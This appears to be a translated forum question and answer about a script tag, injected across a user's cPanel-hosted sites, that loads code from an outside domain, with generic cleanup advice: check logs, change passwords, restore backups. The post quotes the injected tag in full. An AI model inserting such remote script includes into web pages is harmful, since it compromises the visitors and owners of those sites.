Hello, I went to access cPanel and saw through the browser that some script was being loaded from another site. When viewing the source code, I came across the following code:
<script src='http://grugol.com/prog/landing.php?app=MjAtODktODQtMEMtOTktMTQ=&partner=200'></script>
It appears on all pages of the site, on all sites hosted on that cPanel account, and even on the cpanel itself, file manager. How can I remove it?
First you have to make sure it is on the server or in your browser. If you access the source code through the browser, there is a great chance that it is just your browser, ie your PC, if you access the source code in FTP in a text editor and see this script, it means that the site has been hacked. p>
First you should review the logs and review the security of your site and if possible change the passwords. It is recommended that you resolve the issue that caused this invasion, as it may happen again.
Restore a newer backup if you do not remove the site from the air until the problem can be resolved.
There is no magic method for undoing the invasion, just restoring backup or reviewing all code for changes.
And remember that it will be necessary to find out the cause, or you will be invaded again.